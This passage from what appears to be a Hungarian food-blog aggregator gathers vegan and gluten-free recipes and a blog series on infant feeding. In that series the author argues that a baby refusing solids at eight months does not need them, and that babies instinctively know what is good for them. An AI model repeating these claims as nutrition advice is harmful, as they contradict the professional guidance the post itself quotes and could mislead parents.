- 1 db vöröshagyma
- 1-1-1 db piros, sárga és zöld paprika
- 1-2 gerezd fokhagyma vagy néhány szál medvehagyma
- 2 dl növényi tejszín v. 10 dkg tejpor+víz
- só
- 2 ek kukoricakeményítő v. rizsliszt
- egy csipetnyi szerecsendió
Elkészítés:
A vöröshagymát kevés vízen üvegesre pároljuk, hozzáadjuk az felkockázott füstölt tofut, kicsit megsózzuk. Felöntjük a növényi tejszínnel, majd forrásig főzzük. A felvágott paprikát a főzés utolsó tíz percében adjuk hozzá a felaprított fokhagymával/medvehagymával és csipetnyi szerecsendióval együtt. Ha szükséges, még egy kevés sót tehetünk hozzá. Amikor összefőttek rövid idő alatt az ízek, besűrítjük a növényi tejszínnel vagy növényi tejjel elkevert keményítővel vagy rizsliszttel. Gluténmentes tésztát főztem hozzá. Friss salátalevelet is fogyaszthatunk hozzá.
Babakonyha 5. Táplálkozási útmutató a WHO és egyéb javaslatok alapján
2015. március 16. Éltető ételek
"Annak érdekében, hogy a kisbabák a lehető legegészségesebben kezdhessék életüket, az Egészségügyi Világszervezet (WHO) és az ENSZ Gyermekalapja (UNICEF) azt javasolja, hogy a csecsemők hat hónapos korukig kizárólag anyatejet kapjanak, a szoptatás folytatódjék legalább kétéves korig, vagy tovább, amíg a babának és az anyának jólesik." Mindig az anyatej után történjen az ételek, italok kínálása. Tehát az előző részben a BLW módszer teljes mértékben kompatibilis a WHO ajánlásával. Nagyon fontos, hogy a babánkat is egészséges táplálkozás irányelvei alapján tápláljuk. Elég az, ha arra figyelsz, hogy amit magatoknak főzöl, az a kicsi igényeinek is megfeleljen, és meglátod, szívesen bele fog kóstolni abba, amit a család eszik. Természetesen a baba ételei még fűszerezés előtt kerüljön ki a közös tálból, utólag sűrítsük, fűszerezzük azt. Milyen ételek tiltólistásak a konyhánkban, így a babakonyhában is? - minden vegykezelt élelmiszer; - minden finomított élelmiszer (lisztek, étolajak, ecetek, alkoholok stb.); - minden szintetikus élelmiszer (pl. a nem biológiai erjesztésű ecet); - minden instant (azonnal oldódó) élelmiszer; - minden mesterséges adalékanyagot (tartósítószer, színezék, aroma, állományjavító, térfogatnövelő, savanyúság szabályozó, csomósodást gátló, ízfokozó, mesterséges édesítő stb.) tartalmazó élelmiszer; - gyorséttermi ételek; - félkész és/vagy mikrózható ételek; - cukor és minden, ami hozzáadott cukrot tartalmaz; - fehér lisztek; - túl sok állati fehérje (hús, tej, tojás); - utóérlelő és/vagy tartósító gázzal kezelt zöldségek és gyümölcsök; - vákuumgázos élelmiszerek; - cukorral tartósított élelmiszerek; - magas hőfoknak hosszan kitett élelmiszerek; - agyon sütött vagy agyon főzött élelmiszerek és ételek; - felesleges és/vagy környezetkárosító csomagolásban lévő élelmiszerek, - génkezelt élelmiszerek. Persze azért vannak szabályok, amiket meghatározott életkorokban be kell tartani. De ezek apró odafigyeléssel könnyedén megoldhatók. Itt gondolok például arra, hogy ne padlizsánnal vagy éppen káposztával kezdjük a 6 hónapos hozzátáplálást. Ezekre a további részekben ki fogok térni. Bár, ha a baba pont azt veszi el 6 hónaposan, abból sem lesz semmi baja... ... és mit mond a védőnéni? Áttanulmányoztam a Nemzeti Erőforrás Minisztérium szakmai protokollját az egészséges csecsemő (0-12 hónap) táplálásáról, amelyet a Védőnői Szakmai Kollégium állított össze. Természetesen ők is a WHO által javasoltakat írják, tehát "az egészséges csecsemő optimális táplálási módja a 6 hónapos korig tartó - a csecsemő igénye szerinti - kizárólagos szoptatása, amely - hozzátáplálás mellett - egyéves korig a domináns táplálási mód". A szolidok (anyatejen és tápszeren kívüli egyéb étel) bevezetésének optimális időpontja a 17. héttől 26. hétig tart , amely a folyékony-pépestől a szilárd ételekig folyamatosan történjen. "A csecsemő kiegészítő-táplálását hat hónapos korban el kell kezdeni. Hat és nyolc hónapos kor között naponta 1-2 szer, kilenc hónapos kor után napi 3-4-szer, 12 hónapos kor után napi 4-5-ször adható kiegészítés." "A második félévben az anyatej már nem elégíti ki önmagában a fejlődő csecsemő tápanyagszükségletét... A kiegészítés a szoptatás kiegészítésére, a csecsemő plusz tápanyag- és energiaigényének kielégítésére szolgál." A védőnői ajánlásoknál az szúrt szemet, hogy van egy nagy átlag, amit minden gyereknek követni kell! 6 hónapos korban kezdjük a hozzátáplálást, pontos számokkal határozza meg, hányszor és mikor szopjon/egyen, hány kakija legyen... mennyit hízzon, mennyit nőjön. Ha nem tartja a normát, akkor bizony probléma van, még akkor is, ha látszólag egy kiegyensúlyozott, jókedvű babáról van szó. Valaki mondja már meg nekem, hogy ugyan milyen plusz tápanyag van a krumpliban vagy éppen a sütőtökben, ami nincs benne az anyatejben? Szerintem az igény szerinti szoptatás során nem lehet mereven ragaszkodni a szabályokhoz. Ha a baba még 8 hónaposan nem akar szilárd ételt enni, akkor még nincs rá szüksége! A következő részben a természet legtökéletesebb táplálékáról, az anyatejről fogok írni.
Kínai piritott rizs bambuszrüggyel és káposztasalátával (gluténmentes, laktózmentes, vegán)
2015. március 14. Zöld Avocado
Nem tudom ti, hogy vagytok a kínai ételekkel, de mi nagyon szeretjük őket! :-) Ha idegen városban járunk, ahol nem ismerjük a helyi éttermeket, és kihagynánk a szokásos amerikai gyorsétterem láncokat, akkor keresünk egy kínai éttermet. A kínai éttermek nem arra hivatottak, hogy egy ünnepélyes családi ballagási ebédnek, vagy egy romantikus vacsorának a párunkkal, vagy akár egy céges munka vacsorának adjanak helyet! Azonban amikor már olyan éhesek vagyunk, hogy biztosra akarunk menni, és nem ismerjük az adott város lehetőségeit, akkor nekünk mindig ez a tuti befutó! ;-) Kínai piritott rizs bambuszrüggyel és káposztasalátával "A tömeg mindig tudja" elvet követve, olyan kínai éttermet keresünk, ahol bent már más vendégek is jóízűen falatoznak, és nem csak az üres műanyag székek meg a tulajdonosok széles mosolya köszön vissza, mikor benézünk az ablakon. :-) Lassan minden nagyvárosban, most már nagyjából minden sarkon van egy-egy kínai étterem, sőt egyre elterjedtebbek az "All you can eat", azaz "Egyél annyit, amennyi beléd fér" típusú éttermek is. Persze rengeteg rémtörténetet lehet hallani ezekről az éttermekről, de azért vannak közöttük elég igényesek is, ahol tényleg nagyon jól lehet lakni, nagyon jó áron, és másnap sem bánjuk meg. ;-) Ez a recept úgy született, hogy betévedtem egy keleti ízeket, alapanyagokat értékesítő szupermarketbe, ahol kiszúrtam egy bambuszrügy konzervet a polcon. Bambusz? Hmmm, ez elég érdekesnek hangzik. Meg is vettem, és itthon megszületett köré az étel is. Ez a glutén- és laktózmentes, vegán, édes-fűszeres, roppanós, bambuszosrügyes rizs lett belőle! :-) Kínai piritott rizs bambuszrüggyel és káposztasalátával HOZZÁVALÓK: (kb. 4 személyre) - 1,5 bögre barnarizs - 3 bögre víz - kevés szezámolaj - 1 dl sötét szójaszósz - 2 közepes vöröshagyma - 3 ek Agave vagy Juhar szirup (esetleg méz, ha nem ütközik az étkezési elveinkkel) - 1 zöld lime - 1 bambuszrügy konzerv (darabolt) - 1 sütnivaló banán - nyers savanyú káposzta (tetszés szerinti mennyiség) - 3 közepes sárgarépa - fűszerek: bio ételízesítő kocka, fehér bors, chili vagy Cayenne bors - 3-4 marék friss spenót levél ELKÉSZÍTÉS: A saláta... A nyers sárgarépákat hámozzuk meg, majd daraboljuk a két késes turmix gépünkbe. Kevés vízzel felengedve a répa darabkákat, turmixoljuk, és készítsünk belőle répa pürét. Ezt a kész nyers pürét keverjük össze a nyers savanyú káposztával, és tegyük a hűtőbe fogyasztásig. A répa édeskés íze tökéletesen tompítja a káposzta erőteljes savanyú ízét. A kínai rizs... A barna rizst kevés szezámolajon lepirítjuk, majd felengedjük dupla mennyiségű vízzel. Fedő alatt kb.40 perc alatt ropogósan puhára főzzük a szokásos módon. Öntsünk a WOK-ba kevés szezámolajat. A nagyobb darabokra vágott vöröshagymát szórjuk rá, majd adjuk hozzá a 3 ek Agave szirupot. Pirítsuk aranybarnára a mézes hagymát, majd adjuk hozzá az apróra vágott sütni való banánt, a bambuszrügy csíkokat, és öntsük fel az egészet a bambusz konzerv lé felével. Tegyünk bele egy bio ételízesítő / leveskockát, egy kevés fehér borsot, ízlés szerint Cajan borsot vagy szárított chili port (ki mennyire csípősen szereti), 1 zöld lime frissen facsart levét, és 1 dl sötét szójaszószt. Keverjük össze az egészet, főzzük pár percig, majd adjuk hozzá a már előre megfőzött rizst. A WOK jelenlegi tartalmát jól elkeverjük, majd elkezdjük lepirítani. Az egészet folytonos átforgatás mellett pirítjuk, míg kész nem lesz. Ha már úgy látjuk, hogy megpirult a rizs, zárjuk el a tűzhelyet, és adjunk hozzá 3-4 marék friss spenót levelet kisebb darabokra vágva. Káposztasalátával tálalhatjuk, és ehetjük ezt a gyors, ízletes, és rendhagyó kínai jellegű ételt. Kínai piritott rizs bambuszrüggyel és káposztasalátával Jó étvágyat kívánunk a tápanyagban gazdag keleti ízekhez! :-)
Fudge
Ezt a fajta angol édességet úgy hívják: fudge (ejtsd: fádzs). Eredetileg tejkaramellát értettek rajta, de mára se szeri, se száma a különböző változatoknak. Ami közös bennük, hogy gyönyörű táblákból szeletelik, és kimérve árulják a cukrászdákban.
A fudge-dzsal kapcsolatban egy elég muris történet jut eszembe a 2006-os skóciai utamról. Ez volt az egyik kötelező szuvenír, én meg hazafelé a kézitáskámba tettem be a dobozkát, nehogy összenyomódjon.
[...] Bővebben!
2. születésnapi (mogyorókrémes) torta
Az úgy kezdődött, hogy reggel 8-kor már a tortát akartam sütni, ehelyett akkor ébredtem. Illetve fél nyolc körül kinyitottam a szemem, rátekintettem az órára, aztán becsuktam gondolkodás nélkül. :) Második hete voltak már gondjaink az alvással... akkor hajnalban végre rendesen elaludt, vele én is aludtam (volna), csakhogy különleges nap másnapja volt. 8-kor kikászálódtam az ágyból, olvasgattam kicsit, közben főztem egy tejbegrízt, müzlit reggeliztem, és vártam, hogy végre felébredjen. Mert a konyha mellett aludt, és felébreszteni pedig nem akartam. Valójában jól is esett egy kis csend, nyugalom, befelé fordulás. 1/2 11-kor kelt. Az előző 2 évben ilyen nem volt. Így lett a tervezett hajdina piskóta helyett tojásos piskóta. Még jó, hogy a krémet előző este bekavartam. Sűrű vajas krém helyett inkább valami könnyebbet szerettem volna, ezért a pudingos variáció, de szerencsére nem is vehető észre benne. A megadott krémmennyiség egy kisebb tortára elegendő. A dupláját készítettem eredetileg, az egyik torta azután eper, a másik barack lekváros réteget kapott pluszban. Utóbbi nekem jobban bejött (mivel már vagy 5 éve nem ettem ilyesmit, nem vagyok kompetens személy), de a többiek egy szóval nem tiltakoztak az eper miatt. :) Kicsit olyan volt, mintha a piskótatekercset és a dobostortát keresztezték volna. Nagyon finom a férjem szerint is, aki még a karobtól is el tudott tekinteni. :) Vegán, működőképes, és jó tojásmentes piskóta recept pl. ITT található. Hozzávalók: Piskóta: 5 tojás 5 ek eritritből darált porcukor 2 ek teljesőrlésű liszt 4 ek finomliszt 2 ek mogyoróőrlemény 1 ek olivaolaj 2 ek víz sütőpor Egy tepsit kibélelünk zsírpapírral, a sütőt begyújtjuk. A tojások fehérjét és sárgáját kettéválasztjuk. A sárgájához öntjük az olajat és a vizet, beleszórjuk a cukrot, majd addig kavargatjuk, míg kissé kifehéredik a krém. Ezt követően rászórjuk a liszteket, a mogyorót, és a sütőport, és elkeverjük a tésztát. A fehérjéből kemény habot verünk, amelynek a felével először fellazítjuk a sárgájás krémet, azután fakanállal finom mozdulatokkal beledolgozzuk a maradék fehérjét is, vigyázva, hogy nagyon könnyű masszát kapjunk. A masszát azután eloszlatjuk egyenletesen a tepsiben, és 200 C-on 10 percig, majd 180 C-on 20 percig sütjük, míg egy villát a tésztába szúrva már nem találunk rajta nyers tésztanyomokat. Mogyorós tortakrém: 100 g margarin / vaj 100 g törökmogyoró 100 g eritrit 2 ek karob 1 csipet vaníliapor 1/4 l rizstej 1/2 cs bourbon vanília pudingpor 20 csepp sztívia Kevés tejbe csöpögtetjük a sztíviát, és elkeverjük benne hidegen a pudingport. A többi rizstejet feltesszük főni. Amikor forr, beleöntjük a pudingos keveréket, és folyamatosan kavarva kb. 1 percig főzzük. Hűtjük. A törökmogyorót pár perc alatt kissé megpörköljük, majd hűtjük, és ledaráljuk. A margarint és a porcukorrá őrölt eritritet a vaníliaporral együtt fakanállal finomra keverjük. Hozzákavarjuk a mogyorót, majd a kész kihűlt pudingot is, és addig keverjük, amíg elegyednek, és finom krémet kapunk. A piskótát ha nem formában sütöttük, egyszerűen négyfelé vágjuk, és egymásra helyezzük az egyes rétegeket. A rétegek közé először lekvárt, majd krémet, azután megint lekvárt kenünk. Ráhelyezzük az utolsó lapot is, és az egészet beborítjuk a mogyorókrémmel. Szórhatunk rá darált mogyorót, édes morzsát, díszíthetjük a krémmel nyomózsákból, vagy egész mogyorószemekkel, ahogy a szülinapos kedvéért nálunk történt.
Vegán bababarát mandulás banánkenyér
2015. március 7. Zizi kalandjai
Ez a banánkenyér az elmúlt hetekben többször elkészült nálunk. Kipróbáltam, teszteltem a receptet és jó. Egy tesztelés még hátra van, gluténmentes verzióban is szeretném elkészíteni. Ha elkészül, ez a bejegyzés fog frissülni a gluténmentes verzió leírásával.
A héten, csütörtökön is nagy sikert aratott ez a banánkenyér a TV2 Babavilág című műsor dolgozóinak körében, ugyanis ezt készítettem el adásban (ami majd májusban kerül a képernyőre). A műsor miatt utána olvastam egy kicsit ennek a sütinek és kiderült, hogy az 1930-as években jelent meg először szakácskönyvekben az USA-ban és azért született meg, hogy a drágának számító, de már nagyon érett banánokat ne dobják ki a háziasszonyok, hanem egy ilyen “kenyérbe” sütve használják még fel. Ez csak a nevében kenyér, a valóságban sütemény, kiváló reggelire, nassolni vagy délutáni teázáshoz, kávézáshoz. Bababarát verzió (18 hónapos kortól ajánlott) is, ugyanis a három banánon kívül három evőkanál juharszirup van benne, ennyi az összes édesítés. Ezenkívül darált mandula, zabpehely “nehezíti” a tésztáját, valamint fahéj és vanília hozza ki belőle a maximumot. Szerintem vasárnap feltétlen süssétek meg!
Még több banánkenyér:
Vegán földimogyoróvajas
Cukormentes datolyás olívaolajos
Vegán mandulás csokoládés
Diós csokoládés
Vegán mandulás banánkenyér
Hozzávalók:
– 3 db érett banán
– 1 és 1/4 bögre darált mandula (lehet darált törökmogyoróval, dióval is helyettesíteni)
– 1 és 1/4 bögre zabpehely
– 1 és 1/4 bögre tönköly fehérliszt
– 3/4 bögre mandulatej (rizs-, zab-, szójatej is használható)
– 3 evőkanál juharszirup
– 3 evőkanál kókuszolaj, felolvasztva
– 1 evőkanál chia- vagy lenmag
– 3 evőkanál víz
– 3 és 1/2 teáskanál foszfátmentes sütőpor
– 1/2 teáskanál só
– 1/2 teáskanál őrölt fahéj
– 1 db vaníliarúd kikapart magjai
Kétféleképpen tehetjük bele a banánokat. Vagy mindhárom banánt villával pépesre törjük és a tésztához adjuk, vagy csak kettőt törünk pépesre, a harmadikat pedig hosszában félbe vágjuk és a sütemény tetejére tesszük. Én mindkét változatot kipróbáltam. Ha mindhárom banán a tésztájába kerül, akkor picit édesebb lesz a sütemény.
Tegyük egy tálba a pépesre tört két banánt. Öntsük hozzá a mandulatejet, a kókuszolajat és juharszirupot. Adjuk hozzá a sót, f-a fahéjat, a vaníliát és jól keverjük el.
Közben egy kis tálkában keverjük össze a chia magot a vízzel és hagyjuk állni 6-8 percig, amíg zselés állagú lesz (ez helyettesíti a tojást). Melegítsük elő a sütőt 180 fokra.
Adjuk a zselés állagú chia magot a tésztához és jól keverjük el. Jöhet a liszt, a zabpehely és a darált mandula. Az összekevert tésztát öntsük egy 25 cm hosszú püspökkenyér formába, tegyük a tetejére a hosszában félbe vágott banánt és 180 fokon süssük 40-45 percig (végezzünk fogpiszkáló próbát, hogy jól átsült-e már a kenyér, akkor jó, ha a fogpiszkálóra már nem ragad semmi).
Reggelire fel! - Almás-fahéjas zabmorzsa pekán dióval és mogyoróval (laktózmentes, vegán)
A nap legfontosabb étkezése még mindig a reggeli! :-) Fontos, hogy tápláló, energiadús, és ízletes étellel induljunk neki egy újabb napnak. Sokszor nem jut rá elegendő idő, vagy csak a reggeli lustaság miatt próbáljuk elcsalni ezt az étkezést, mégis fontos lenne, hogy odafigyeljünk rá! Ha a testünk, és a lelkünk is kellemesen kezdi a napot, az a nap folyamán még a hasznunkra lesz. Jobb közérzettel, több energiával, emésztési gondok nélkül, lendületesebb mozdulatokkal, szellemi frissességgel, melegebb szívvel, és mosolygósabb arccal élhetjük meg a következő 15-16 órát, ami ránk vár. ;-) Almás-fahéjas zabmorzsa pekán dióval és mogyoróval Korábbi ígéretemhez híven újabb energiadús reggeli ötlettel érkeztem, ami nem mellesleg egy személyes kedvenc. Nálunk ez egy tipikus lustizós szabadnapos reggeli. Olyan napokra, amikor tudom, hogy az ebéd sokára fog elkészülni, mert pihenés és lustálkodás lesz a program a hosszúra nyúlt délelőtt. :-) Az almás-fahéjas íz pedig tökéletes a hidegebb napokra, amik remélhetőleg egy pár hónapig nem jönnek még vissza. ;-) Pár éve, mikor Írországba költöztünk, akkor ismerkedtem meg közelebbről a zabbal, mint nagyon hasznos és értékes gabonával. Az ír reggeliző asztalokon mindennapos az ún. porridge. Ez egy natúr, tejjel készült zabkása, melyet főként mazsolával és mézzel édesítenek. Az igényesebbek már aszalt gyümölcsöket is tesznek hozzá. Híg, kása jellegű étel, ami a mi tejbegrízünkhöz hasonlít. Nekem ezek a bébipapi állagú híg ételek (pl.: főzelékek, kásák) sosem tartoztak a kedvenceim közé. Szeretem, ha van mit rágni egy ételben. Nálam egy jó tejbegríz is darabos! ;-) Az íreknél olyan gyakori a porridge, mint nálunk magyaroknál a túrórudi. :-) Utánanéztem hát egy kicsit ennek a zab dolognak, mert láttam, hogy itt milyen népszerű ez a gabona, miközben korábban Magyarországon szinte egyáltalán nem találkoztam vele. Kiderült, hogy rendkívül értékes tápanyag és még olcsó is! Sokkal értékesebb, mint az általunk oly gyakran használt búzadara. zabA zab, az egyik leglassabban felszívódó gabona fajta, ami nagyon jól jön, amikor tudjuk, hogy a reggelink és az ebédidőnk között túl sok idő tellik el. Tökéletes reggeli egy lustálkodós napon, vagy amikor elutazunk valahová... vagy pont ellenkezőleg, a magas energia és szénhidrát tartalma miatt, akkor is tökéletesen táplál minket, amikor nagyobb fizikai terhelésnek tesszük ki magunkat, vagy csak átfáztunk valahol, és szeretnénk gyorsan belülről is felmelegedni. Magas rosttartalma segít a természetes, rendszeres emésztésben. Jelentős ásványi anyag, vitamin tartalommal rendelkezik, és a 7 fontos aminósavból is nagy mennyiségben találhatunk benne. Főként telítetlen zsírokat tartalmaz, ami szintén fontos egy egészségesen működő szervezet számára. Csökkenti a koleszterin szintet, segít megelőzni a szív- és érrendszeri betegségeket, és cukorbetegek is bátran fogyaszthatják. Még hosszasan lehetne sorolni a zab előnyös tulajdonságait, de nem untatlak vele tovább titeket. Akit érdekel a téma bővebben, az olvasson utána a neten. :-) Tehát miután rájöttem, hogy be kell vinnem a mindennapi táplálkozásunkba ezt a szuper gabonát is, elkezdtünk kísérletezgetni a hagyományos ír zabkásával, a porridge-val. A cél az volt, hogy rágható, és ízletes reggeli készüljön belőle! Úgy tűnik sikerült! :-) Közel egy éve majdnem minden nap része a reggelinknek, ilyen-olyan formában. Egy ilyen nagyon finom, tápanyagdús és abbahagyhatatlan energia bomba reggelit hoztam nektek, amit úgy neveztem el, hogy almás-fahéjas zabmorzsa pekán dióval és mogyoróval. Almás-fahéjas zabmorzsa pekán dióval és mogyoróval HOZZÁVALÓK: (1 személyre) - 1 bögre zabpehely - 1 bögre növényi tej (jelen esetben a mogyorótej a legideálisabb választás) - 1 közepes alma (meghámozva) - 1 fél banán - ízlés szerint sok fahéj, egy csipet őrölt szerecsendió, és egy késhegynyi őrölt szegfűszeg - 1 marék pekán dió és mogyoró keveréke (de használhatunk sima diót, vagy brazil diót is) - (opcionálisan - 1 tk őrölt lenmag) Az 1 bögre, jelen esetben kb.2 dl - nek felel meg, és a bögrét nem tesszük tele. Kis gyomrúak, vagy "reggelizni nem szoktam" típusú olvasóim kisebb adagokat használjanak, mert ebből a mennyiségből kiadós végeredmény lesz. ELKÉSZÍTÉS: A mogyorótejet feltesszük egy lábasban a tűzhelyre forrni. Mielőtt forrni kezd, beletesszük a zabpelyhet, és a fél banánt, amit előzőleg felkockáztunk. Visszavesszük a hőfokot, és lassú tűzön, folytonos kevergetés mellett kb. 5 perc alatt megfőzzük. Ne lepődjünk meg, hogy a tej eltűnik időközben. A zab rendelkezik egy ilyen tulajdonsággal. Magába szívja a folyadékot. A banán is szétesik egy idő után, ami szintén jó, mert az édesíti meg a reggelinket, így sem mézet, sem cukrot nem kell használnunk. Amikor már úgy tűnik, hogy megfőtt a zab, azaz eltűnt a tej, és zabmorzsává vált az étel, akkor levesszük a tűzről. Hozzáadjuk a téli fűszereket, a (pekán) diót, a mogyorót, és a kisebb kockákra vágott almabelsőt (héj nélkül). Az egészet összekeverjük, és egy jó kis, mély ún. müzlis tálban tálalva vissza is ülhetünk vele a meleg takaró alá, és élvezhetjük, ahogyan minden egyes kanál újabb és újabb melegséggel járja át a testünket. Nem kell sietni az ébredezéssel! ;-) Almás-fahéjas zabmorzsa pekán dióval és mogyoróval Kezdjük a napot emészthető, tápanyagban gazdag és energiadús reggelikkel! Reggelire fel! :-) Megjegyzés1: sima dióval is finom, de a pekán dió különleges zamata tökéletesen kiegészíti az alma és a fahéj kombinációt. Megjegyzés2: aki szereti a kásás, híg állagot, az tegyen bele fele annyi zabot, és hagyja abba a főzést, még mielőtt megszilárdulna, morzsalékossá válna az étel. Így a végén igazi zabkását fog enni! Megjegyzés3: A banános képen láthatjátok, hogyan lehet gyorsan, és mosogatásmentesen feldarabolni a banánt! :-D Hagyjátok meg az alsó héjat, amikor megpucoljátok, és, mint egy tálca azon vágjátok be a banán karikákat, majd egy hússzú kereszt vágással, kész is lesznek a kicsi fél banán karikák, amik mehetnek is egyből bele a zabmorzsába / zabkásába. Nem kell utána mosogatni, és villámgyors elkészül. ;-)
Banán nyalókák
2015. március 3. Gréta konyhája
Ma itthon maradt a fiam, mert szinte az összes óvónéni lebetegedett, így nem volt muszáj oviba mennie. Mivel többnyire délelőtt a konyhában vagyok, szeret nekem besegíteni a finomságok elkészítésében, én meg imádom, hogy egy kreatív, lelkes kuktával tudok dolgozni. A hideg (előző éjszaka hűtőbe tett) banánokból, étcsokiba mártott, kókuszpehelybe, és sósmogyoróforgácsba hempergetett nyalókákat készítettünk. Az étcsokit egyszerűen gőz felett megolvasztottuk, elvágtuk félbe a banánokat, hurkapálcát szúrtunk a közepébe, mártottunk, hempergettünk, egy sütőpapírra tettük őket, majd vissza a hűtőbe. Minden gyermekes szülőt arra buzdítok, hogy engedje be a gyermekét a konyhába. Lefoglalja őket, alkotnak, együtt vagyunk, és lelkesedve eszik az általuk készített, házi egészséges édességeket. Tökéletes program!
Babakonyha. 1.rész. A TE döntésed, a te felelősséged
2015. március 1. Éltető ételek
Miért gondoljuk azt, hogy egy baba táplálásának másképp kell történnie, mint egy felnőtt ember egészséges táplálkozásának? Ezen azt értem, hogy vannak olyan alapelvek, amelyeket minden esetben be kell tartani, függetlenül attól, hogy az a baba étele, vagy éppen egy felnőtté. Most nézzük meg, hogy mire figyeljünk oda, amikor ételt vagy italt adunk a gyerekünknek. A szülő felelőssége, hogy mit eszik a gyerek Az, hogy mit eszik egy gyerek, az a szülő felelőssége (döntése). Nem a szomszédé, nem az anyósé és nem is a védőnőé! Persze lehet tanácsot kérni, sőt kell is. Ma már nagyon sok információhoz hozzá tudunk jutni, nem úgy, mint mondjuk 12 éve, amikor csak a védőnőnek és a nagymamának hihettünk. Nekem a nagylányom 13 éves lesz, bizony születése után mit nem adtam volna, ha a kezembe foghatok egy egészséges babatáplálós könyvet. Nem mertem főzni, egyszerűbb volt megvenni a bébiételeket, persze a védőnő is ezt tanácsolta. Meg azt gondoltam, hogy egy bébiételnek különlegesnek kell lennie, hiszen mégiscsak egy bébiétel, pedig ezek elkészítése a legegyszerűbb. A második és a harmadik lányomnál már más volt a helyzet. Rájöttem, hogy nem kell túlkomplikálni a dolgokat. Mindennap főztem nekik ebédet, és friss gyümölcsöket, zöldségeket kaptak. A babáknak még működnek az ösztöneik Vannak kutatások, pro és kontra vélemények - mint pl. a glutén bevezetése -, de szerintem nagy hibát nem tudunk elkövetni, ha teljes értékű ételeket adunk a babánknak. Ők még elég okosak ahhoz, hogy ÖSZTÖNÖSEN tudják, mi a jó nekik. Ne gondoljuk azt, hogy ha készítünk egy banános-zabos kekszet, az a babának nem fog ízleni, mert nekünk se ízlik. A babának még nincs kialakulva az ízérzéke, neki nem kell sózni, édesíteni, fűszerezni az ételeit. A mi ízlésünk már kialakult, a babáé még csak most fog, és rajtad múlik, hogy ez milyen lesz. Hidd el, szívesen fogja enni az ilyen egyszerű ételeket is. Élelmiszeripar = Függőség De ha a szülő elrontja, na, akkor van a baj. Ordít a gyerek? Veszek neki a közeli látványpékségből valami "finomságot". Legközelebb, ha arra járunk, már az illatot érezve ordítani fog, hogy az bizony kell neki. Ez nem más, mint egy függőség kialakulása . Ezekben a félkész ételekben olyan adalékanyagok, illatanyagok vannak, amelyekre azon nyomban beindul a pavlovi reflex, és bizony a gyerek követelni fogja magának. És mit tesz egy anyuka, aki nem akar hisztit? Megveszi neki! Az élelmiszeripar manipulálja a gyerekek, majd ezáltal a felnőttek ízlését . Garantálja a piacot még 50 év múlva is. Mit szeret a gyerek? Legyen édes, tetszetős csomagolású... ennyi. Miért van az, hogy a gyerek az eperjoghurtot szereti, maga az eper meg nem ízlik neki? Hát azért, mert elsőként az eperjoghurttal találkozott. Ehhez viszonyít. Az édes, mű ízhez! Nem ismerik a természetes ízeket! Mi, szülők vagyunk az oka annak, hogy a gyerek válogatós! Nem hagyjuk az ösztöneiket szabadon érvényesülni. Legyen megfelelő kínálat az asztalon, változatosan. Ismerjen meg minél több zöldséget, gyümölcsöt, gabonákat. Ekkor még nincs előítélet, hogy pfújjj brokkoli, ekkor még simán megkóstolja és eldönti, hogy kell-e neki. A későbbiekben ismertetett BLW módszernek is részben ez a lényege. Persze lehetnek egyéb egészségügyi okok, ami miatt válogatós. Ilyen pl. az ételintolerancia, amikor a gyerek ösztönösen tudná, hogy az nem jó neki, de a szülő meg nem tud vagy nem akar mást adni! Pedig lehetne!!!
Mákos-kókuszos trüffel
2015. március 1. Éltető ételek
Nagyon szeretem a mákot, igazi kalciumbomba. Bár a magas kalciumtartalmán kívül számos jótékony hatással bír. Ez egy igazán egyszerű, és gyors finomság, ha valami édességre vágyunk. Hozzávalók: - 3 dkg darált mák - 3 dkg kókuszreszelék - 5 dkg datolyavaj (2-3 szem datolya) - 5 dkg aszaltszilva lekvár (kb. 5-6 db aszaltszilva) - 1/2 kávéskanál fahéj - 2-3 csepp citromolaj Elkészítése: Először is a datolyát és a szilvát vágjuk kis darabkákra, majd annyi vizet öntsünk rá, hogy éppen ellepje. Néhány óra elteltével (a datolya akár egész éjszaka ázhat) botmixerezzük össze. A mákot daráljuk le, majd mindent gyúrjunk össze. Édesítésre nincs szükség, hiszen az aszalványok kellően megédesítik, megízesítik. Forgassuk meg kókuszreszelékbe.
Édes bundás kenyér kesudiós-banános töltelékkel
Bundás kenyér édes változatában nekem ez volt az első próbálkozásom. Amennyire ódzkodtam tőle az elején, a végére csak annyi volt a gondolatom, de kár, hogy elfogyott... :)) Próbáljátok ki, nem bánjátok meg! Édes bundás kenyér kesudiós-banános töltelékkelElkészítési idő: kb. 25 perc Hozzávalók (2 főre): A pirítóshoz 60 g kesudiókrém 1/2 tk. őrölt vanília 1 csipet tengeri só 1 ek. agave szirup 4 szelet teljes kiőrlésű kenyér 1 banán A bundázáshoz 60 g teljes kiőrlésű liszt 105 ml szójatej 30 g agave szirup 1 tk. őrölt vanília 1 csipet tengeri só 1/2 tk. őrölt fahéj 30 g cukormentes kukoricapehely 10 g puffasztott amaránt 5 ek. kókuszolaj A kesukrémet az őrölt vaníliával, a sóval és az agave sziruppal krémesre keverjük, majd ezzel a krémmel bekenjük a kenyérszeleteket. Meghámozzuk a banánt, vékony szeletekre vágjuk és elosztjuk két szelet kenyéren. Mindegyik banános szeletre ráteszünk egy másikat is, és kicsit összenyomjuk. A bundázáshoz egy habverővel összekeverjük a lisztet a szójatejjel, az agave sziruppal, a vaníliával, a sóval és fahéjjal. A kukoricapelyhet kézzel összemorzsoljuk, egy mély tányérba tesszük, és elkeverjük a puffasztott amaránttal. A kókuszolajat felhevítjük egy serpenyőben. A kenyérszeleteket belemártjuk a lisztes keverékbe, majd belehempergetjük az amarántos kukoricapehelybe. A szendvics mindkét oldalát 3-4 percig sütjük a kókuszolajban közepes hőfokon. A vékonyabbik oldalát is süssük meg, a kenyeret kicsit az élére állítva. Papírtörlőre szedjük és friss gyümölccsel tálaljuk. Forrás: Attila Hildmann: Vegan for Fit
Régi kedvencek újratöltve: Bögrés mákos és diós
2015. február 25. Dulmina tündérkonyhája
Ez az egyszerű sütemény csupa tápláló, reform hozzávalóból van, melyeket akár előre is össze lehet készíteni, aztán sütés előtt már csak forró víz kell hozzá. Az üveg tartalma (előre összekészíthető száraz hozzávalók): 2 dl darált dió, 2 dl zabkorpa, 2 dl búzacsíra, 2 dl pehelymix vagy natúr müzlialap, 1 dl barna cukor (édesszájúak növelhetik kicsit a mennyiséget), 1 marék mazsola, 1
Joghurtos lencsesaláta
